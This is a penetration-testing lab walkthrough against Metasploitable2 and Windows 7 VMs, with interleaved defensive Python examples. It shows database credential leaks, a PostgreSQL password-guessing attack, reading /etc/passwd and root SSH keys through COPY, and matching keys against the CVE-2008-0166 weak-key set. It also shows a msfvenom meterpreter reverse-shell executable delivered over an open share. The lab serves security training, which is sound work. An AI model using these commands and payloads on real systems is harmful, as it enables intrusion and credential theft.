   URI      /tikiwiki        yes       TikiWiki directory path
   VHOST                     no        HTTP server virtual host


Auxiliary action:

   Name      Description
   ----      -----------
   Download 

 


msf auxiliary(tikidblib) > set RHOST 192.168.20.204
RHOST => 192.168.20.204

 


msf auxiliary(tikidblib) > run

[*] Establishing a connection to the target...
[*] Get informations about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type      : mysql
[*] DB name      : tikiwiki195
[*] DB host      : localhost
[*] DB user      : root
[*] DB password  :
[*] Auxiliary module execution completed
msf auxiliary(tikidblib) >
msf auxiliary(tikidblib) > quit
root@kali:~#

 - Connect to Metasploitable2-Linux and check the MySQL information

@ Kali Linux

root@kali:~# telnet 192.168.20.204

~ output abridged ~


Warning: Never expose this VM to an untrusted network!

 

Contact: msfdev[at]metasploit.com

 

Login with msfadmin/msfadmin to get started


metasploitable login: msfadmin
Password: msfadmin

 

 

msfadmin@metasploitable:~$ mysql -u root -p
Enter password: (press Enter)
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 193
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

 

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

 

mysql>
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.00 sec)

 

 

mysql> use tikiwiki195
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed


mysql> show tables;
~ output abridged ~
| users_objectpermissions            |
| users_permissions                  |
| users_usergroups                   |
| users_users                        |
+------------------------------------+
194 rows in set (0.00 sec)

 


mysql> select * from users_users;
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| userId | email | login | password | provpass | default_group | lastLogin  | currentLogin | registrationDate | challenge | pass_due | hash                             | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
|      1 |       | admin | admin    | NULL     | NULL          | 1271712540 |   1271712540 |             NULL | NULL      |     NULL | f6fdffe48c908deb0f4c3bd36c032e72 |    NULL | NULL       |       NULL | NULL           | NULL       | NULL          | NULL       |     0 |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
1 row in set (0.01 sec)

 

mysql> select login,password from users_users;
+-------+----------+
| login | password |
+-------+----------+
| admin | admin    |
+-------+----------+
1 row in set (0.00 sec)

 

mysql> quit
Bye
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ exit
Connection closed by foreign host.

 - Test logging in through the web interface with 'admin/admin'

@ Kali Linux

root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php

Log in with 'admin/admin'

Kali Linux

 - Start Firefox and open the following URL.

root@kali:~# firefox &

 

http://192.168.20.204/tikiwiki/tiki-listpages.php?offset=0&sort_mode=

Once the page loads, scroll down and read the 'root' password

Finding and exploiting a vulnerability (CVE-2008-0166)

scan -> attack the PostgreSQL ID/PASSWORD -> connect to PostgreSQL -> obtain user account information -> compromise the SSH key -> connect over SSH

Metasploitable2-Linux

msfadmin@metasploitable:~$ sudo -s
[sudo] password for msfadmin: msfadmin
root@metasploitable:~# passwd
Enter new UNIX password: toor
Retype new UNIX password: toor
passwd: password updated successfully
root@metasploitable:~# exit

Kali Linux

- Search Exploit-DB for OpenSSL

root@kali:~# /usr/share/exploitdb/searchsploit openssl
--------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                       |  Path
                                                                     | (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------- ----------------------------------
OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs | ./multiple/dos/146.c
Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c) | ./linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit | ./multiple/dos/4773.pl
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl) | ./multiple/remote/5622.txt

- Download the SSH RSA key files

root@kali:~# cd /var/tmp
root@kali:/var/tmp#
root@kali:/var/tmp# wget --no-check-certificate https://github.com/offensive-security/exploit-database-binsploits/raw/master/sploits/5622.tar.bz2
--2016-06-03 11:28:57-- https://github.com/offensive-security/exploit-database-binsploits/raw/master/sploits/5622.tar.bz2
Resolving github.com (github.com)... 192.30.252.121

~ output abridged ~

Extract the SSH RSA key archive

root@kali:/var/tmp# tar xvif 5622.tar.bz2
rsa/
rsa/2048/
rsa/2048/2712a6d5cec99f295a0c468b830a370d-28940.pub
rsa/2048/eaddc9bba9bf3c0832f443706903cd14-28712.pub
~ output abridged ~
root@kali:/var/tmp# cd
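The archive extracted above holds the public keys that the broken Debian OpenSSL PRNG could produce (CVE-2008-0166): because the PRNG had almost no entropy, the whole key space could be generated in advance. From the defender's side the corresponding check is the one Debian's ssh-vulnkey performed: compare the fingerprint of every key in authorized_keys against the published list of known-weak fingerprints. The following is an added example, not the page's code or the exploit archive: it parses authorized_keys entries, computes the fingerprints and flags blocklisted or too-short keys. The keys and the blocklist below are constructed (the moduli are fixed numbers, not real RSA keys), and the 2048-bit minimum is this example's own policy choice.

```python
"""Check authorized_keys entries against a blocklist of known-weak fingerprints.

Added example for this page, not Debian's ssh-vulnkey and not the 5622
archive. The keys and the blocklist are constructed test data; the moduli are
fixed integers, not real RSA keys, which is enough to exercise the parsing
and fingerprinting that a real check performs.
"""
import base64
import hashlib
import struct
from typing import Dict, List, Set, Tuple


def _string(s: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(s)) + s


def _mpint(n: int) -> bytes:
    """SSH wire-format mpint: a leading zero byte keeps the value positive."""
    b = n.to_bytes((n.bit_length() + 8) // 8, "big")
    return _string(b)


def make_rsa_pubkey_line(e: int, n: int, comment: str) -> str:
    """Build an OpenSSH 'ssh-rsa <base64 blob> comment' line from e and n."""
    blob = _string(b"ssh-rsa") + _mpint(e) + _mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def parse_rsa_pubkey(line: str) -> Tuple[int, int, str, bytes]:
    """Return (e, n, comment, raw blob) for one authorized_keys line."""
    parts = line.split(None, 2)
    if len(parts) < 2 or parts[0] != "ssh-rsa":
        raise ValueError("not an ssh-rsa entry")
    blob = base64.b64decode(parts[1])
    fields, off = [], 0
    while off < len(blob):
        (length,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        fields.append(blob[off:off + length])
        off += length
    if len(fields) != 3 or fields[0] != b"ssh-rsa":
        raise ValueError("malformed ssh-rsa blob")
    e = int.from_bytes(fields[1], "big")
    n = int.from_bytes(fields[2], "big")
    return e, n, parts[2] if len(parts) == 3 else "", blob


def fingerprints(blob: bytes) -> Dict[str, str]:
    """MD5 colon form (what OpenSSH of that era printed) and SHA256 form."""
    md5 = hashlib.md5(blob).hexdigest()
    sha = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return {"md5": ":".join(md5[i:i + 2] for i in range(0, 32, 2)),
            "sha256": "SHA256:" + sha}


def audit_authorized_keys(text: str, weak_md5: Set[str], min_bits: int = 2048) -> List[str]:
    """Return one finding per blocklisted or undersized key."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        e, n, comment, blob = parse_rsa_pubkey(line)
        fp = fingerprints(blob)
        if fp["md5"] in weak_md5:
            findings.append(f"line {lineno} ({comment}): fingerprint {fp['md5']} is on the weak-key blocklist")
        if n.bit_length() < min_bits:
            findings.append(f"line {lineno} ({comment}): {n.bit_length()}-bit modulus is below {min_bits} bits")
    return findings


# Constructed keys (fixed integers standing in for moduli; not real RSA keys).
WEAK_N = (1 << 2047) | 0x1337
SHORT_N = (1 << 1023) | 0x5
GOOD_N = (1 << 2047) | 0x9999
WEAK_KEY = make_rsa_pubkey_line(65537, WEAK_N, "weak@lab")
SHORT_KEY = make_rsa_pubkey_line(65537, SHORT_N, "short@lab")
GOOD_KEY = make_rsa_pubkey_line(65537, GOOD_N, "ok@lab")

# Constructed blocklist: in a real check this is the published set of
# fingerprints of every key the broken PRNG could generate.
WEAK_MD5_BLOCKLIST = {fingerprints(parse_rsa_pubkey(WEAK_KEY)[3])["md5"]}

SAMPLE_AUTHORIZED_KEYS = "\n".join(["# constructed authorized_keys", WEAK_KEY, SHORT_KEY, GOOD_KEY])

if __name__ == "__main__":
    for finding in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_MD5_BLOCKLIST):
        print(finding)
```

The fingerprint is computed over the decoded blob, which is exactly what ssh-keygen -l hashes, so the same comparison works against a blocklist produced with stock OpenSSH tooling; the archive's file names, one per key, are the attacker-side form of the same list.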

Scanning '192.168.20.204'
- Scan '192.168.20.204' with nmap

Kali Linux
root@kali:~# nmap -sV 192.168.20.204


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 12:06 KST
Nmap scan report for 192.168.20.204
Host is up (0.00061s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
~ output abridged ~

PostgreSQL user name/password dictionary attack

root@kali:~# msfconsole -q

msf > search postgres_login

msf > use auxiliary/scanner/postgres/postgres_login

msf auxiliary(postgres_login) > show options

 

~ output abridged ~

   RHOSTS                            yes       The target address range or CIDR identifier
   RPORT            5432             yes       The target port
   STOP_ON_SUCCESS  false            yes       Stop guessing when a credential works for a host

msf auxiliary(postgres_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204
msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true

 

msf auxiliary(postgres_login) > exploit   (the word "exploit" means to take unfair advantage of something)

[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.20.204:5432 - LOGIN SUCCESSFUL: postgres:postgres@template1
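Both the mysql_login run earlier and the postgres_login run above leave a very recognisable trace on the server: a burst of failed logins from one address, here followed by a success. The following added example (not Metasploit code) detects that pattern over constructed PostgreSQL and MySQL log lines. Assumptions: PostgreSQL has log_connections = on and a log_line_prefix of '%m [%p] %h ' so the client address appears on every line; MySQL writes its "Access denied" lines to the error log (log_warnings raised); the threshold and window are illustrative.

```python
"""Detect password-guessing bursts against PostgreSQL and MySQL from their logs.

Added example for this page (not Metasploit code). SAMPLE_LOG is constructed.
Assumptions: PostgreSQL runs with log_connections=on and
log_line_prefix='%m [%p] %h ' (client address on every line); MySQL logs
'Access denied' to its error log (log_warnings raised).
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional, Tuple

SAMPLE_LOG = """\
2016-06-03 12:10:01 KST [4321] 192.168.20.50 FATAL:  password authentication failed for user "postgres"
2016-06-03 12:10:01 KST [4322] 192.168.20.50 FATAL:  password authentication failed for user "postgres"
2016-06-03 12:10:02 KST [4323] 192.168.20.50 FATAL:  password authentication failed for user "postgres"
2016-06-03 12:10:02 KST [4324] 192.168.20.50 FATAL:  password authentication failed for user "postgres"
2016-06-03 12:10:03 KST [4325] 192.168.20.50 FATAL:  password authentication failed for user "postgres"
2016-06-03 12:10:03 KST [4326] 192.168.20.50 LOG:  connection authorized: user=postgres database=template1
2016-06-03 12:40:00 KST [4400] 192.168.20.77 FATAL:  password authentication failed for user "app"
2016-06-03T03:05:14.000000Z 12 [Note] Access denied for user 'root'@'192.168.20.50' (using password: NO)
2016-06-03T03:05:14.000000Z 13 [Note] Access denied for user 'root'@'192.168.20.50' (using password: YES)
2016-06-03T03:05:15.000000Z 14 [Note] Access denied for user 'admin'@'192.168.20.50' (using password: NO)
2016-06-03T03:05:15.000000Z 15 [Note] Access denied for user 'admin'@'192.168.20.50' (using password: YES)
2016-06-03T03:05:16.000000Z 16 [Note] Access denied for user 'admin'@'192.168.20.50' (using password: YES)
"""

PG_FAIL = re.compile(r'^(\S+ \S+) \S+ \[\d+\] (\S+) FATAL:\s+password authentication failed for user "([^"]+)"')
PG_OK = re.compile(r'^(\S+ \S+) \S+ \[\d+\] (\S+) LOG:\s+connection authorized: user=(\S+)')
MY_FAIL = re.compile(r"^(\S+) \d+ \[\w+\] Access denied for user '([^']+)'@'([^']+)'")

Event = Tuple[datetime, str, str, str, bool]   # (time, service, source ip, user, success?)


def parse_line(line: str) -> Optional[Event]:
    """Normalise one PostgreSQL or MySQL log line into an Event, or None."""
    m = PG_FAIL.match(line)
    if m:
        return datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"), "postgresql", m.group(2), m.group(3), False
    m = PG_OK.match(line)
    if m:
        return datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"), "postgresql", m.group(2), m.group(3), True
    m = MY_FAIL.match(line)
    if m:
        return datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S.%fZ"), "mysql", m.group(3), m.group(2), False
    return None


def detect(log_text: str, threshold: int = 5, window_s: int = 60) -> List[str]:
    """Alert on >= threshold failures from one source within window_s seconds,
    and on any success from a source that is already in such a burst."""
    alerts: List[str] = []
    recent: Dict[Tuple[str, str], Deque[datetime]] = defaultdict(deque)   # (service, ip) -> failure times
    bursting = set()
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ts, service, ip, user, success = ev
        key = (service, ip)
        if success:
            if key in bursting:
                alerts.append(f"CRITICAL {service}: login as {user} from {ip} succeeded right after a guessing burst")
            continue
        q = recent[key]
        q.append(ts)
        while q and (ts - q[0]).total_seconds() > window_s:   # slide the window
            q.popleft()
        if len(q) >= threshold and key not in bursting:
            bursting.add(key)
            alerts.append(f"WARNING {service}: {len(q)} failed logins from {ip} within {window_s}s (password guessing)")
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The success-after-burst rule is the one worth paging on: a guessing burst alone is noise on an exposed service, but a burst followed by "connection authorized" from the same address means a credential was found. The matching fixes are the obvious ones this lab ignores: no empty or default superuser passwords (the mysql_login success earlier was 'root:' with no password at all), pg_hba.conf host lines limited to the addresses that need access, and these alerts fed into fail2ban or the SIEM.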

 

 

Connecting to the PostgreSQL server and inspecting the databases

Connecting

root@kali:~# psql -h 192.168.20.204 -U postgres ---> psql: connect to the database server at 192.168.20.204 as the postgres user
Password for user postgres: postgres

- Check the user table

postgres=# select * from pg_user;
 usename  | usesysid | usecreatedb | usesuper | usecatupd |  passwd  | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
 postgres |       10 | t           | t        | t         | ******** |          |
(1 row)

 

 

Add a 'test' user and verify

postgres=# create user test with password 'test1234';
CREATE ROLE
postgres=# select * from pg_user;
 usename  | usesysid | usecreatedb | usesuper | usecatupd |  passwd  | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
 postgres |       10 | t           | t        | t         | ******** |          |
 test     |    16384 | f           | f        | f         | ******** |          |

 

Grant the 'test' user superuser rights and verify
postgres=# alter user test with superuser;
ALTER ROLE
postgres=# select * from pg_user;
 usename  | usesysid | usecreatedb | usesuper | usecatupd |  passwd  | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
 postgres |       10 | t           | t        | t         | ******** |          |
 test     |    16384 | f           | t        | f         | ******** |          |
(2 rows)


- List all schemas and databases
postgres=# \dn
  List of schemas
  Name  |  Owner
--------+----------
 public | postgres
(1 row)

postgres=# \l
                               List of databases
   Name    |  Owner   | Encoding |   Access privileges
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8     |
 template0 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
(3 rows)

- Create the accounts table and copy the contents of '/etc/passwd' into it
postgres=# create table accounts (linux_users text);
CREATE TABLE

- Show the rows of the accounts table that contain 'bash'
postgres=# select * from accounts where linux_users like '%bash%';
                                 linux_users
------------------------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
(5 rows)

- Create the sshkeys table and copy the contents of '/root/.ssh/authorized_keys' into it
postgres=# create table sshkeys (auth_key text);
CREATE TABLE
postgres=# copy sshkeys from '/root/.ssh/authorized_keys';
COPY 1

- Show the rows of the sshkeys table that contain 'ssh-rsa'
postgres=# select * from sshkeys where auth_key like '%ssh-rsa%';
auth_key
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
(END)
q

 

 

- Disconnect from PostgreSQL
postgres=# \q
root@kali:~#

Ex6) Reconnect to the PostgreSQL server to obtain the SSH RSA key
- Query the sshkeys table and save the SSH key to a file
root@kali:~# psql -h 192.168.20.204 -U postgres -c 'select * from sshkeys limit 1' | tee sshkeys.txt
Password for user postgres: postgres
auth_key
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)

- Check the 'sshkeys.txt' file
root@kali:~# ls -l sshkeys.txt
-rw-r--r-- 1 root root 1229 6월 3 12:42 sshkeys.txt
root@kali:~# cat sshkeys.txt
auth_key
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
- Search 'sshkeys.txt' for 'ssh-rsa' and print the second field (the key body)
root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}'
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w==
- Check again with the trailing '==' removed
root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
- Search the '/var/tmp/rsa/2048/*.pub' files for the same key as in 'sshkeys.txt' and save the result as 'keys.txt'
root@kali:~# fgrep `grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'` /var/tmp/rsa/2048/*.pub | tee keys.txt
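The grep/awk/sed/fgrep pipeline above compares base64 text with its padding stripped. As an added example that is not part of the original page, the following Python script does the same lookup on decoded key material: it rejoins a psql row whose base64 body is wrapped over several lines (as in the capture above), computes the OpenSSH SHA256 fingerprint and checks it against every '*.pub' file in a weak-key directory; the same function lets a defender audit any leaked or authorized key against such a set. The psql output, the '.pub' files and the RSA moduli are constructed placeholders built by `demo()` in a temporary directory that stands in for the page's /var/tmp/rsa/2048.

```python
"""Added example (not from the original page): match a key pulled from the sshkeys table against a
weak-key directory by decoded-blob SHA256 fingerprint, not by grepping base64 text. All keys are constructed."""
import base64
import hashlib
import re
import tempfile
from pathlib import Path

# The base64 body may be wrapped over several lines and the comment may sit on its own line.
KEY_RE = re.compile(r"ssh-rsa\s+([A-Za-z0-9+/\n]+={0,2})(?:\s+(\S+))?\s*$")
def ssh_rsa_blob(e: int, n: int) -> bytes:
    """Build an ssh-rsa wire blob: string 'ssh-rsa', mpint e, mpint n."""
    def mpint(x: int) -> bytes:  # big-endian, with an extra 0x00 byte when the high bit is set
        return x.to_bytes((x.bit_length() + 8) // 8, "big")
    def sshstr(b: bytes) -> bytes:
        return len(b).to_bytes(4, "big") + b
    return sshstr(b"ssh-rsa") + sshstr(mpint(e)) + sshstr(mpint(n))

# Constructed placeholder keys: the moduli are arbitrary numbers, not real RSA keys.
LEAKED_B64 = base64.b64encode(ssh_rsa_blob(65537, (1 << 1023) | 0x5EED)).decode()
OTHER_B64 = base64.b64encode(ssh_rsa_blob(65537, (1 << 1023) | 0xBEEF)).decode()

def fingerprint(b64: str) -> str:
    """OpenSSH-style 'SHA256:<unpadded base64>' fingerprint of a base64 key body."""
    blob = base64.b64decode(b64, validate=True)
    assert blob[:11] == b"\x00\x00\x00\x07ssh-rsa", "not an ssh-rsa key blob"
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).rstrip(b"=").decode()

def parse_psql_keys(text: str) -> list[tuple[str, str]]:
    """(fingerprint, comment) for each ssh-rsa row of psql's aligned output."""
    body = "\n".join(line.strip() for line in text.splitlines())
    body = re.split(r"^\(\d+ rows?\)$", body, flags=re.M)[0]  # drop psql's trailing row count
    rows = re.split(r"^(?=ssh-rsa )", body, flags=re.M)[1:]
    found = [KEY_RE.search(row) for row in rows]
    return [(fingerprint(re.sub(r"\s", "", m.group(1))), m.group(2) or "") for m in found if m]

def find_weak_keys(psql_output: str, weak_dir: Path) -> list[tuple[str, str, str]]:
    """(fingerprint, comment, matching .pub file) for each leaked key present in the weak set."""
    index = {fingerprint(f[1]): p.name for p in sorted(weak_dir.glob("*.pub"))
             if len(f := p.read_text().split()) >= 2 and f[0] == "ssh-rsa"}
    return [(fp, c, index[fp]) for fp, c in parse_psql_keys(psql_output) if fp in index]

def demo() -> list[tuple[str, str, str]]:
    """Constructed scenario: the leaked key is one of two weak-set keys; output wrapped like the page's."""
    wrapped = "\n".join(LEAKED_B64[i:i + 70] for i in range(0, len(LEAKED_B64), 70))
    psql_output = f"auth_key\n{'-' * 70}\n ssh-rsa {wrapped}\nmsfadmin@metasploitable\n(1 row)\n"
    with tempfile.TemporaryDirectory() as d:
        Path(d, "00001.pub").write_text(f"ssh-rsa {OTHER_B64} weak-1\n")
        Path(d, "00002.pub").write_text(f"ssh-rsa {LEAKED_B64} weak-2\n")
        return find_weak_keys(psql_output, Path(d))
```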

 


 

 

(Reverse TCP attack)

 - This test can also be done entirely within Metasploit, but here the exploit (attack) code is built by hand and tested.

 - In addition, a backdoor is set up and the attack code (malicious file) is delivered so that the target system connects back to the attacker.

[Lab steps]

Scan -> select the attack target -> configure the backdoor -> generate the attack code file -> deliver the attack code file to the target

-> run the backdoor -> run the attack code file -> gain control

Samba service configuration

 Kali Linux

 - Configure the Samba service so that the malicious file can later be copied from Windows 7

root@kali:~# mkdir -p /share
root@kali:~# chmod 777 /share
root@kali:~# vi /etc/samba/smb.conf

 ~ (omitted) ~

[share]
        comment = Test Shared Directory
        path = /share
        browseable = yes
        read only = no
        writable = yes
        public = yes

: wq!

 

 

 

 - Restart the Samba service and check the share status

 

root@kali:~# service smbd restart


root@kali:~# smbclient -L localhost -N
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.17-Debian]

 Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 share           Disk      Test Shared Directory
 IPC$            IPC       IPC Service (Samba 4.1.17-Debian)
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.17-Debian]

 Server               Comment
 ---------            -------

 Workgroup            Master
 ---------            -------

 

 

 

 

Creating the backdoor

 - Create the backdoor (handler) to be run with msfconsole.

 

@ Kali Linux

 

root@kali:~# mkdir -p /root/bin
root@kali:~# cd /root/bin
root@kali:~/bin# vi reverse_resource.rc

 

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.20.50
set ExitSession false
exploit -j -z

 

: wq!

 

 

 


 

 

Generating the attack code with a payload

 - Generate the 'reverse.exe' attack code file to be delivered to Windows 7.

 

Kali Linux

 

root@kali:~/bin# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.50 LPORT=4444 -f exe -o reverse.exe


No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: reverse.exe


root@kali:~/bin# ls re*
reverse.exe  reverse_resource.rc

 

 

 

 

Ex4) Delivering the 'reverse.exe' attack code file

 - In the test environment, Windows 7 obtains the 'reverse.exe' file from the Kali Linux share.

 

@ Kali Linux

 

root@kali:~/bin# cp reverse.exe /share


root@kali:~/bin# ls /share
reverse.exe

 

 

 - Download the 'reverse.exe' file on Windows 7.

@ Windows 7

 

 

Run (Windows key + R) -> \\192.168.20.50

 

 

 

 

Click the 'share' directory

 

 

 

 

Copy the 'reverse.exe' file to the desktop

 

 

 

'reverse.exe' file copy complete

 

 

 

 

 

Ex5) Running the backdoor 'reverse_resource.rc'

 

@ Kali Linux

 

root@kali:~/bin# msfconsole -r reverse_resource.rc
                                                 
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


Save 45% of your time on large engagements with Metasploit Pro
Learn more on http://rapid7.com/metasploit

 

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

 

[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.20.50:4444 
[*] Starting the payload handler...

msf exploit(handler) >

 

 

 

Ex6) Running the 'reverse.exe' attack code file

@ Windows 7

 

 

 

 

 

 

Ex7) Checking the state of the backdoor 'reverse_resource.rc'

 - Check whether Windows 7 has connected to Kali Linux.

 

@ Kali Linux

 

msf exploit(handler) >
[*] Sending stage (1188911 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49190) at 2016-06-03 16:30:56 +0900


